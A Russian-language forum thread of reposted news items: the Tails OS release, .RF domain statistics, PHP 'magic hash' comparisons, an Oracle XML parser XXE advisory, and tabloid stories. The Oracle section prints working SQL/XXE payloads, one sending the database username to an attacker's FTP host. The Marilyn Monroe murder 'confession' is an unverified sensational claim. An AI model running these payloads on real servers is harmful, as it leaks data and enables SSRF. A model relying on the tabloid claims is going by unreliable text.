Общая тема Другие Новости [Всё то, о чём Вы хотели сообщить..]

Думаю дело то не в борще..

 

Вышел первый релиз анонимной ОС, которой пользуется Сноуден

Операционная система Tails 1.0, позволяющая полностью скрывать свое присутствие в Сети, стала доступна для пользователей. Система полностью размещается в ОЗУ и не копирует файлы на жесткий диск, а для всех типов коммуникаций использует анонимную сеть Tor, которая не позволяет отследить местоположение пользователя. Для запуска Tails можно использовать любой ПК, не оставляя следов.



Проект The Amnesic Incognito Live System или просто Tails объявил о выходе первого релиза анонимной операционной системы с одноименным названием — Tails 1.0.

На разработку Tails ушло более 5 лет. Первая публичная версия ОС была представлена в июне 2009 г. и называлась Amnesia. С тех пор было выпущено 36 стабильных версий, включая Tails 1.0.

Tails — это полноценная ОС, базирующаяся на Debian GNU/Linux. У системы открытый исходный код, созданный сообществом анонимных разработчиков.

ОС предлагается со всем необходимым встроенным ПО, включая веб-браузер, клиент для обмена мгновенными сообщениями, пакет офисных приложений, редакторы изображений и звука и др.

Кроме того, в состав Tails входит набор средств шифрования трафика для всех видов коммуникаций: LUKS — для шифрования файлов, HTTPS Everywhere — веб-трафика, OpenPGP — писем, а OTR — мгновенных сообщений. Также в комплект входит шредер файлов Nautilus Wipe.

Основная задача Tails — скрывать присутствие пользователя сети. Помимо этого система позволяет преодолевать цензуру в интернете, то есть помогает открывать заблокированные по этой причине сайты.

Для выполнения этих задач Tails использует анонимную сеть Tor. Tor — это сеть пользовательских компьютеров, которые пропускают через себя трафик, стирая его след. В результате, становится невозможно вычислить, кто именно в сети просматривает конкретный сайт.

Сеть Tor изначально была военным проектом США, но впоследствии разработчики открыли ее код и сделали доступной всем желающим.

Если какое-либо приложение в Tails попытается подключиться к интернету напрямую, минуя сеть Tor, соединение будет заблокировано.

Запустить Tails можно с DVD, USB-флешки или SD-карты независимо от того, какая ОС установлена на компьютере. При этом система не копирует файлы на жесткий диск, а полностью размещается в ОЗУ. Когда пользователь заканчивает работу в Tails или выключает компьютер, все данные ОС из ОЗУ исчезают. Таким образом, пользователь не оставляет следов, а ПК затем можно продолжить использовать с той ОС, которая на нем стояла.

Как пишет CNet, этой операционной системой пользуется Эдвард Сноуден (Edward Snowden) для связи с журналистами. Сноуден — бывший сотрудник АНБ и ЦРУ, который раскрыл множество сведений о работе американской разведки и нашел убежище в России.

Согласно официальному сайту проекта, работа над Tails будет продолжена. Ближайшее обновление — Tails 1.1 — планируется выпустить в июне.

Также в планах разработчиков уже прописаны Tails 2.0 и Tails 3.0. Во второй версии они намерены сконцентрироваться на функциях обслуживания ОС, скорости выпуска обновлений; в третьей — на повышении уровня безопасности, включая внедрение технологии изолирования приложений. Сроки выпуска этих версий не сообщаются.

Источник cnews.ru
скачать https://tails.boum.org/index.en.html

 

Первому кириллическому домену .РФ – 4 года!

​

Четыре года назад, 12 мая 2010 года, в России появился новый национальный домен - .РФ, ставший первым кириллическим доменом в мире. Администратором нового корневого домена официально стал Координационный центр национального домена сети Интернет.
На сегодняшний день в домене .РФ зарегистрировано 820,538 доменных имен, из них делегировано 651,161 доменное имя или почти 80% от общего числа, что на 5% больше чем в прошлом году. Всего за прошедший год домен .РФ вырос на 3.8%.

На 185,056 (22.6%) доменных именах в домене .РФ размещены работающие вебсайты, еще на 112,314 (13.7%) доменных именах сайты находятся в стадии разработки. 16.2% (132,972) доменных имен используются для парковки, а 11.2% (92,238) - для редиректа.

76,4% доменных имен зарегистрировано физическими лицами, 23,6% - юридическими.

37.4% доменных имен в домене .РФ имеет возраст 3 года и старше. Интересно, что в .RU этот показатель немного ниже – здесь таких доменных имен насчитывается 35.7%.

Средняя длина доменного имени в домене .РФ составляет 11.1 символа. Для сравнения: средняя длина доменного имени в .RU – 9.6 символа.

Источник: Cctld.ru ​

 

В свете последних законотворческих инициатив в отношении рунета, домену .РФ не долго осталось.

 

наивный

 

кто был первым?

 

Бывший агент ЦРУ признался в убийстве Мэрилин
Монро

​

Утечка данных из региональной прессы в США может объяснить загадку смерти Мэрилин Монро. Оказывается, в небольшом госпитале штата Вирджиния один из пациентов на смертном одре признался, что он — тот самый киллер, который по заданию ЦРУ убил звезду Голливуда и еще больше 30 артистов, политиков, журналистов и общественных лидеров.​

Норман Ходжес сказал, что он стоял во главе пятерки профессионалов, которые подстраивали все, чтобы смерть людей, опасных для власти, выглядела как несчастный случай. Вот что рассказал Ходжес о подготовке убийства Монро.

"У нас появилось свидетельство того, что Мэрилин Монро переспала не только с Кеннеди, но и с Фиделем Кастро. Мой начальник Джимми Хэйворт сказал, что она должна умереть, и я должен устроить, чтобы все выглядело как суицид или передозировка. Мне раньше не приходилось убивать женщин, но я подчинился приказу. Я сделал это для Америки! Ведь Монро могла передавать коммунистам стратегически важную информацию, а мы не могли допустить этого".

Норман Ходжес сейчас находится в палате для умирающих в наручниках. ФБР восприняли его признание как очень серьезное обвинения против секретной службы. Сейчас идет расследование. Скандал уже вышел на общемировой уровень. Хотя факты до сих пор не проверенные. Впрочем, Ходжес называет одного из своих руководителей, а это не последний человек в ЦРУ. Он скончался от сердечного приступа в 2001 году. Коллеги Ходжеса из спецподразделения тоже умерли.



Мерилин Монро была жестоко убита по приказу Роберта Кеннеди

В документальной книге «Убийство Мерилин Монро: дело закрыто» журналисты пишут, что Монро ликвидировали, когда она попыталась рассказать публике о грязных тайнах клана Кеннеди, во многие из которых оказалась вовлечена лично. Убрать Монро с дороги Роберту помогли актер Питер Лоуфорд и психиатр актрисы Ральф Гринсон, который вколол ей в сердце смертельную дозу пентобарбитала. Финальному акту трагедии предшествовал внезапный и сумбурный роман Роберта Кеннеди с Мерилин Монро. Случилось это, когда Джон Кеннеди направил брата в Лос-Анджелес с целью убедить Монро не названивать ему в Белый дом. Роберт должен был объяснить Монро, что Джон не собирается разводиться с супругой Жаклин и жениться на Мерилин. В ходе переговоров с актрисой Роберт сам оказался в ее постели.

​

 

С секюритиЛАБ украл. Кстати там заканчивается действие ССЛ сертификата
Специалист WhiteHat Security Роберт Хансен (Robert Hansen) обнаружил уязвимость, которая получила название Magic Hash. Брешь позволяет хешировать входные данные при помощи PHP-инструментов определенным образом и как следствие получить доступ к паролям и другим функциям систем, которые используют сравнение PHP-хеша.



Хансен сообщил, что практически любой сайт подвергается опасности из-за уязвимости Magic Hash. Проблема возникает после того, как используются операторы «!=» и «==». Каждый раз, когда любой из этих операторов получает для сравнения хэш-сумму, каждый хешированный элемент, который начинается с «0e» с нулем в качестве значения для него, обрабатывается сайтом при помощи PHP.



В случае, если хеш-суммы двух паролей начинаются с «0e», написанная на PHP система будет перехватывать их, поскольку оба будут иметь одинаковое значение 0. Несмотря на то, что связанные с этими двумя паролями хеш-суммы будут различными в целом, PHP-система рассматривает их как идентичные, если используется оператор «!=» или «==».



Брешь затрагивает главным образом работу системы аутентификации, а также потоки данных функции возобновления пароля и cookie-файлы. Хансен заявил, что это полностью зависит от web-сайта и от того, как он построен.



Нет никаких сомнений, что возможные последствия подобной уязвимости огромны, поскольку она позволяет злоумышленникам скомпрометировать учетную запись пользователя, вставляя строку кода всякий раз, когда значение хеш-суммы приравнивается к нулю. По словам Хансена, если пароль сохранен в таком же виде и в базе, то злоумышленник легко получит доступ к учетной записи.

 

Описание уязвимости

Модуль XML-парсера базы данных Oracle уязвим к XXE-инъекции (XML External Entity).

Уязвимые версии: 11.2.0.3, 11.2.0.4, 12.1.0.1 и 12.1.0.2

Необходимый уровень привилегий: Создание сессии

Технические детали

Из-за настроек безопасности XML-парсера в Oracle внешняя схема преобразуется (resolve), но не анализируется. Таким образом, предотвращается использование некоторых типов XXE-инъекций, например, связанных с чтение локальных файлов на удаленном сервере базы данных. Однако злоумышленник может отослать специальный SQL-запрос для вызова XML Resolver'а, заставляя сервер соединиться с удаленным ресурсом через HTTP или FTP. Этот трюк позволяет просачиваться информации через посторонние каналы, выполнять сканирование портов на удаленных внутренних системах, выполнять SSRF-атаки (Server-Side Request Forgery, Межсерверная подделка запросов) или создавать условия для DoS-атак.

Уязвимые обработчики URI:

· http:

· ftp:

XML-парсер в Oracle может быть вызван при помощи функции extractvalue() для объектаxmltype. Ниже показан пример запроса с простейшей полезной нагрузкой в XXE-инъекции:

select extractvalue(xmltype('<!ENTITY xxe SYSTEM "etc/passwd">]>'|| '&' ||'xxe;'),'/l') from dual;

Если выполнить вышеуказанный запрос, возникнет следующая ошибка:

ORA-31001: Invalid resource handle or path name "/etc/passwd"
ORA-06512: at "SYS.XMLTYPE", line 310
ORA-06512: at line 1
31001. 00000 - "Invalid resource handle or path name \"%s\""
*Cause: An invalid resource handle or path name was passed to
the XDB hierarchical resolver.
*Action: Pass a valid resouce handle or path name to the hierarchical
resolver.

Ошибка возникает по причине того, что обработчик FILE URI конвертируется в путь к XDB Repository. Однако изменение запроса и использование обработчика HTTP URI вызывает другую ошибку.

Пример:

select extractvalue(xmltype('<!ENTITY xxe SYSTEM "http://IP/test">]>'|| '&' ||'xxe;'),'/l') from dual;

Возникает следующая ошибка:

ORA-31020: The operation is not allowed,
Reason: For security reasons, ftp and http access over XDB repository is not allowed on server side
ORA-06512: at "SYS.XMLTYPE", line 310
ORA-06512: at line 1
31020. 00000 - "The operation is not allowed, Reason: %s"
*Cause: The operation attempted is not allowed
*Action: See reason and change to a valid operation.

Ошибка, приведенная выше, означает, что обработчики FTP URI или HTTP URI могут быть приняты XML-парсером. Обратите внимание, что запрос, приведенный выше, не отсылает никакие HTTP-запросы к системе злоумышленника. Давайте рассмотрим еще одну полезную нагрузку, которая привязана к Parameter Entity вместо Document Entity:

select extractvalue(xmltype('<?xml version="1.0"
encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "
http://IP/test"> %remote; %param1;]>'),'/l') from dual;

При запуске запроса выше на сервере баз данных возникнет та же сама ошибка (ORA-31020). Однако в этот раз сервер отсылает HTTP-запрос на ресурс с именем «test». Ниже приведен лог HTTP-запросов с сервера злоумышленника:

ncat -lvp 80
Ncat: Version 6.25 ( http://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from DB_IP.
Ncat: Connection from DB_IP:27320.
GET /test HTTP/1.0
Host: DB_IP
Content-Type: text/plain; charset=utf-8

Обычно злоумышленнику требуется привилегированный доступ к пакету UTL_HTTP для того, чтобы спровоцировать сервер на создание HTTP-запросов к внешнему ресурсу. Поскольку функция extractvalue() доступна всем пользователям, XXE-инъекция предоставляет еще один способ отсылки «внеплановых» запросов без использования дополнительных привилегий.

Обработчик FTP URI (ftp также может использоваться для вызова XML Resolver’a в Oracle. Запрос, приведенный ниже, отсылает имя пользователя базы данных как имя пользователя FTP-сервера:

select extractvalue(xmltype('<?xml version="1.0" encoding="
UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "
ftp://'||user||':bar@IP/test"> %remote; %param1;]>'),'/l') from dual;

После запуска запроса возникает следующая ошибка (обратите внимание, что код ошибки отличается, поскольку предоставленные учетные данные не могут быть использованы для авторизации на удаленном FTP-сервере).

ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML processing
LPX-00202: could not open "ftp://SYSTEM:bar@IP/test" (error 402)
Error at line 1
ORA-06512: at "SYS.XMLTYPE", line 310
ORA-06512: at line 1
31011. 00000 - "XML parsing failed"
*Cause: XML parser returned an error while trying to parse the document.
*Action: Check if the document to be parsed is valid.

Имя пользователя базы данных включено в FTP-трафик и отсылается на сервер злоумышленника как имя пользователя FTP-сервера:



Рисунок 1: Попытка соединения с FTP-сервером при помощи учетной записи базы данных

Рекомендации

Установите обновление CPUJan2015, выпущенное компанией Oracle.
Украс с секюритиЛАБ.РУ

 

так написано же уборка, борщ, интим.
Кстати из скрина видно СерГЕЙ 24 ЛЕТ. но что то у него табло старое для 24 ЛЕТ

 

Доброго дня.
Собственно заинтересовала эта новость. http://tass.ru/obschestvo/1984868
Прежде всего интересуют последствия этого закона для партнерских программ и продаж с товаров с одностраничников.
Если я правильно понял, то отношение имеет именно к партнерским программам.
Кто что думает по этому поводу?

 

Миллиардер арендовал известную порнозвезду на 15 лет


22-летняя порнозвезда русско-японского происхождения Рола Мисаки, также известная, как Рола Такизава, больше не принадлежит ни себе, ни своим поклонникам. Узкопрофильная актриса продалась на 15 лет в рабство за 7,5 миллионов долларов. Отныне ее хозяин неизвестный китайский миллиардер, сообщает Metro.


Неизвестного мужчину в маске видели в компании Ролы Такизавы на нескольких светских мероприятиях в Пекине. Согласно 15-летнему контракту, который заключила 22-летняя девушка с китайским предпринимателем, она больше не имеет права сниматься в фильмах для взрослых.


Многочисленные поклонники Ролы восприняли новость о сдаче их любимицы в аренду крайне негативно. "Как она могла так поступить с нами? Она была едва ли не самой естественной и натуральной актрисой в жанре. Это просто возмутительно", — написал один из фанатов Такизавы в китайской социальной сети Weibo.


Рола Такизава дебютировала в порнобизнесе в 2012 году, и с тех пор обрела большую армию фанатов, в основном из Китая.

22 мая 2015​

http://www.vesti.ru/doc.html?id=2599949​

 

Представьте что он её поцелует.